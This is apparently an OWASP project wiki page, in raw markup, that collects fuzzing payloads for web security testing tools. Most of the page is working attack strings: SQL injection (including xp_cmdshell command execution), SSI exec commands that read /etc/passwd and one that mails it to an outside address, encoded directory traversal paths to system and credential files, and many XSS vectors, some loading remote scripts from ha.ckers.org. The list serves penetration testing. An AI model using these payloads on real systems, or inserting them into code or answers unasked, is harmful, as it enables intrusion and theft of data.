We want to collect all these statements, merging the statements from several projects like [[WebScarab]] and [[JBroFuzz]] with member contributions to build a comprehensive dataset of effective statements to provide better testing results.&lt;br /&gt;
Please add your own statements and check out the statements already added. &lt;br /&gt;
&lt;br /&gt;
==== News ====&lt;br /&gt;
&lt;br /&gt;
'''7 August 2009'''&lt;br /&gt;
	&lt;br /&gt;
* Updated the objectives of the project. &lt;br /&gt;
&lt;br /&gt;
'''21 July 2009'''&lt;br /&gt;
&lt;br /&gt;
* Set the team responsible for the project.&lt;br /&gt;
&lt;br /&gt;
==== Goals ====&lt;br /&gt;
&lt;br /&gt;
This project intend to create a database that concentrate all tools which are based on wordlists such as Webscarab, JBroFuzz, Web Slayer , Dirbuster. and others. In addition to current tools developed by OWASP members we will create a database following a style similar to Open Vulnerability and Assessment Language (OVAL) where any tool can adopt and use a XML file maintained by OWASP.&lt;br /&gt;
&lt;br /&gt;
In addition, the following functionalities will be included on this project:&lt;br /&gt;
&lt;br /&gt;
1 - The statements of ASDR Project&lt;br /&gt;
2 - Browser&lt;br /&gt;
3 - Operational System&lt;br /&gt;
4 - Databases&lt;br /&gt;
&lt;br /&gt;
An URL will also be published to create an collaborative environment for the maintenance process where the following features are planned:&lt;br /&gt;
&lt;br /&gt;
1 - Deploy a process where a new statement can be suggested and registered if is not valid yet and not maintained in other database.&lt;br /&gt;
&lt;br /&gt;
2 - A list where besides the statement, a single id will be maintained to identify each statement with a description and the results of the exploitation.&lt;br /&gt;
&lt;br /&gt;
3 - Possibility to support users on the report of their own experiences with the statements.&lt;br /&gt;
&lt;br /&gt;
==== Statements ====&lt;br /&gt;
&lt;br /&gt;
=== SQL Injection Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'sqlvuln&lt;br /&gt;
'+sqlvuln&lt;br /&gt;
sqlvuln;&lt;br /&gt;
(sqlvuln)&lt;br /&gt;
a' or 1=1--&lt;br /&gt;
a&amp;quot; or 1=1--&lt;br /&gt;
&amp;quot; or &amp;quot;a&amp;quot; = &amp;quot;a&lt;br /&gt;
a' or 'a' = 'a&lt;br /&gt;
1 or 1=1&lt;br /&gt;
a' waitfor delay '0:0:10'--&lt;br /&gt;
1 waitfor delay '0:0:10'--&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A&lt;br /&gt;
0&lt;br /&gt;
031003000270000&lt;br /&gt;
declare @s varchar(22) select @s =&lt;br /&gt;
0x77616974666F722064656C61792027303A303A31302700 exec(@s)&lt;br /&gt;
declare @q nvarchar (4000) select @q =&lt;br /&gt;
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)&lt;br /&gt;
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e&lt;br /&gt;
exec(@s)&lt;br /&gt;
a'&lt;br /&gt;
?&lt;br /&gt;
' or 1=1&lt;br /&gt;
‘ or 1=1 --&lt;br /&gt;
x' AND userid IS NULL; --&lt;br /&gt;
x' AND email IS NULL; --&lt;br /&gt;
anything' OR 'x'='x&lt;br /&gt;
x' AND 1=(SELECT COUNT(*) FROM tabname); --&lt;br /&gt;
x' AND members.email IS NULL; --&lt;br /&gt;
x' OR full_name LIKE '%Bob%&lt;br /&gt;
23 OR 1=1&lt;br /&gt;
'; exec master..xp_cmdshell 'ping 172.10.1.255'--&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== SSI (Server Side Includes) Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;/bin/ls /&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;find / -name *.* -print&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;!--#exec cmd=&amp;quot;mail Foobar@email.de &amp;lt;mailto:Foobar@email.de&amp;gt; &amp;lt; cat /etc/passwd&amp;quot; --&amp;gt;&amp;lt;br/&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Directory Traversal Statements ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
\..\..\..\..\..\..\WINDOWS\win.ini&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39&lt;br /&gt;
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c&lt;br /&gt;
../../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../../etc/passwd&lt;br /&gt;
../../../../../../etc/passwd&lt;br /&gt;
../../../../../etc/passwd&lt;br /&gt;
../../../../etc/passwd&lt;br /&gt;
../../../etc/passwd&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34&lt;br /&gt;
../../../.htaccess&lt;br /&gt;
../../.htaccess&lt;br /&gt;
../.htaccess&lt;br /&gt;
.htaccess&lt;br /&gt;
././.htaccess&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
''Sorry for breaking the layout - but &amp;quot;breaking the layout&amp;quot; could become &amp;quot;breaking the software&amp;quot;.''&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Most effective/most common statements ===&lt;br /&gt;
&lt;br /&gt;
Testing Statements&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//&amp;quot;;alert(String.fromCharCode(88,83,83))//\&amp;quot;;alert(String.fromCharCode(88,83,83))//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt; &lt;br /&gt;
'';!--&amp;quot;&amp;lt;XSS&amp;gt;=&amp;amp;{()}&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Common exploit code (covers a lot of XSS vulnerabilities)&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt='&lt;br /&gt;
&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=&amp;quot;&lt;br /&gt;
\'&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83))&amp;lt;/SCRIPT&amp;gt;&amp;lt;img src=&amp;quot;&amp;quot; alt=\'&lt;br /&gt;
'); alert('xss'); var x='&lt;br /&gt;
\\'); alert(\'xss\');var x=\'&lt;br /&gt;
//--&amp;gt;&amp;lt;/SCRIPT&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(String.fromCharCode(88,83,83));&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== XSS Statements - Full List ===&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=JaVaScRiPt:alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(&amp;amp;quot;XSS&amp;amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=`javascript:alert(&amp;quot;RSnake says, 'XSS'&amp;quot;)`&amp;gt;&lt;br /&gt;
&amp;lt;IMG &amp;quot;&amp;quot;&amp;quot;&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;)&amp;lt;/SCRIPT&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#106;&amp;amp;#97;&amp;amp;#118;&amp;amp;#97;&amp;amp;#115;&amp;amp;#99;&amp;amp;#114;&amp;amp;#105;&amp;amp;#112;&amp;amp;#116;&amp;amp;#58;&amp;amp;#97;&amp;amp;#108;&amp;amp;#101;&amp;amp;#114;&amp;amp;#116;&amp;amp;#40;&amp;amp;#39;&amp;amp;#88;&amp;amp;#83;&amp;amp;#83;&amp;amp;#39;&amp;amp;#41;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#0000106&amp;amp;#0000097&amp;amp;#0000118&amp;amp;#0000097&amp;amp;#0000115&amp;amp;#0000099&amp;amp;#0000114&amp;amp;#0000105&amp;amp;#0000112&amp;amp;#0000116&amp;amp;#0000058&amp;amp;#0000097&amp;amp;#0000108&amp;amp;#0000101&amp;amp;#0000114&amp;amp;#0000116&amp;amp;#0000040&amp;amp;#0000039&amp;amp;#0000088&amp;amp;#0000083&amp;amp;#0000083&amp;amp;#0000039&amp;amp;#0000041&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;amp;#x6A&amp;amp;#x61&amp;amp;#x76&amp;amp;#x61&amp;amp;#x73&amp;amp;#x63&amp;amp;#x72&amp;amp;#x69&amp;amp;#x70&amp;amp;#x74&amp;amp;#x3A&amp;amp;#x61&amp;amp;#x6C&amp;amp;#x65&amp;amp;#x72&amp;amp;#x74&amp;amp;#x28&amp;amp;#x27&amp;amp;#x58&amp;amp;#x53&amp;amp;#x53&amp;amp;#x27&amp;amp;#x29&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav	ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x09;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0A;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;jav&amp;amp;#x0D;ascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;IMG SRC=java\0script:alert(\&amp;quot;XSS\&amp;quot;)&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
perl -e 'print &amp;quot;&amp;lt;SCR\0IPT&amp;gt;alert(\&amp;quot;XSS\&amp;quot;)&amp;lt;/SCR\0IPT&amp;gt;&amp;quot;;' &amp;gt; out&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot; &amp;amp;#14;  javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/XSS SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;BODY onload!#$%&amp;amp;()*~+-_.,:;?@[/|\]^`=alert(&amp;quot;XSS&amp;quot;)&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT/SRC=&amp;quot;http://ha.ckers.org/xss.js&amp;quot;&amp;gt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);//&amp;lt;&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&amp;lt;B&amp;gt;&lt;br /&gt;
&amp;lt;SCRIPT SRC=//ha.ckers.org/.j&amp;gt;&lt;br /&gt;
&amp;lt;IMG SRC=&amp;quot;javascript:alert('XSS')&amp;quot;&lt;br /&gt;
&amp;lt;iframe src=http://ha.ckers.org/scriptlet.html &amp;lt;&lt;br /&gt;
&amp;lt;SCRIPT&amp;gt;a=/XSS/\nalert(a.source)&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
\&amp;quot;;alert('XSS');//&lt;br /&gt;
&amp;lt;/TITLE&amp;gt;&amp;lt;SCRIPT&amp;gt;alert(&amp;quot;XSS&amp;quot;);&amp;lt;/SCRIPT&amp;gt;&lt;br /&gt;
&amp;lt;INPUT TYPE=&amp;quot;IMAGE&amp;quot; SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BODY ONLOAD=alert('XSS')&amp;gt;&lt;br /&gt;
&amp;lt;IMG DYNSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IMG LOWSRC=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BGSOUND SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;BR SIZE=&amp;quot;&amp;amp;{alert('XSS')}&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LAYER SRC=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/LAYER&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;LINK REL=&amp;quot;stylesheet&amp;quot; HREF=&amp;quot;http://ha.ckers.org/xss.css&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@import'http://ha.ckers.org/xss.css';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;Link&amp;quot; Content=&amp;quot;&amp;lt;http://ha.ckers.org/xss.css&amp;gt;; REL=stylesheet&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;BODY{-moz-binding:url(&amp;quot;http://ha.ckers.org/xssmoz.xml#xss&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;behavior: url(xss.htc);&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;li {list-style-image: url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;UL&amp;gt;&amp;lt;LI&amp;gt;XSS&lt;br /&gt;
&amp;lt;IMG SRC='vbscript:msgbox(&amp;quot;XSS&amp;quot;)'&amp;gt;&lt;br /&gt;
¼script¾alert(¢XSS¢)¼/script¾&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;META HTTP-EQUIV=&amp;quot;refresh&amp;quot; CONTENT=&amp;quot;0; URL=http://;URL=javascript:alert('XSS');&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;IFRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/IFRAME&amp;gt;&lt;br /&gt;
&amp;lt;FRAMESET&amp;gt;&amp;lt;FRAME SRC=&amp;quot;javascript:alert('XSS');&amp;quot;&amp;gt;&amp;lt;/FRAMESET&amp;gt;&lt;br /&gt;
&amp;lt;TABLE BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;TABLE&amp;gt;&amp;lt;TD BACKGROUND=&amp;quot;javascript:alert('XSS')&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;background-image: url(&amp;amp;#1;javascript:alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;DIV STYLE=&amp;quot;width: expression(alert('XSS'));&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;@im\port'\ja\vasc\ript:alert(&amp;quot;XSS&amp;quot;)';&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;IMG STYLE=&amp;quot;xss:expr/*XSS*/ession(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;XSS STYLE=&amp;quot;xss:expression(alert('XSS'))&amp;quot;&amp;gt;&lt;br /&gt;
exp/*&amp;lt;A STYLE='no\xss:noxss(&amp;quot;*//*&amp;quot;);xss:&amp;amp;#101;x&amp;amp;#x2F;*XSS*//*/*/pression(alert(&amp;quot;XSS&amp;quot;))'&amp;gt;&lt;br /&gt;
&amp;lt;STYLE TYPE=&amp;quot;text/javascript&amp;quot;&amp;gt;alert('XSS');&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;STYLE&amp;gt;.XSS{background-image:url(&amp;quot;javascript:alert('XSS')&amp;quot;);}&amp;lt;/STYLE&amp;gt;&amp;lt;A CLASS=XSS&amp;gt;&amp;lt;/A&amp;gt;&lt;br /&gt;
&amp;lt;STYLE type=&amp;quot;text/css&amp;quot;&amp;gt;BODY{background:url(&amp;quot;javascript:alert('XSS')&amp;quot;)}&amp;lt;/STYLE&amp;gt;&lt;br /&gt;
&amp;lt;!--[if gte IE 4]&amp;gt;&amp;lt;SCRIPT&amp;gt;alert('XSS');&amp;lt;/SCRIPT&amp;gt;&amp;lt;![endif]--&amp;gt;&lt;br /&gt;
&amp;lt;BASE HREF=&amp;quot;javascript:alert('XSS');//&amp;quot;&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT TYPE=&amp;quot;text/x-scriptlet&amp;quot; DATA=&amp;quot;http://ha.ckers.org/scriptlet.html&amp;quot;&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&amp;gt;&amp;lt;param name=url value=javascript:alert('XSS')&amp;gt;&amp;lt;/OBJECT&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;http://ha.ckers.org/xss.swf&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;EMBED SRC=&amp;quot;data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg==&amp;quot; type=&amp;quot;image/svg+xml&amp;quot; AllowScriptAccess=&amp;quot;always&amp;quot;&amp;gt;&amp;lt;/EMBED&amp;gt;&lt;br /&gt;
&amp;lt;HTML xmlns:xss&amp;gt;&amp;lt;?import namespace=&amp;quot;xss&amp;quot; implementation=&amp;quot;http://ha.ckers.org/xss.htc&amp;quot;&amp;gt;&amp;lt;xss:xss&amp;gt;XSS&amp;lt;/xss:xss&amp;gt;&amp;lt;/HTML&amp;gt;&lt;br /&gt;
&amp;lt;XML ID=I&amp;gt;&amp;lt;X&amp;gt;&amp;lt;C&amp;gt;&amp;lt;![CDATA[&amp;lt;IMG SRC=&amp;quot;javas]]&amp;gt;&amp;lt;![CDATA[cript:alert('XSS');&amp;quot;&amp;gt;]]&amp;gt;&amp;lt;/C&amp;gt;&amp;lt;/X&amp;gt;&amp;lt;/xml&amp;gt;&amp;lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&amp;gt;&amp;lt;/SPAN&amp;gt;&lt;br /&gt;
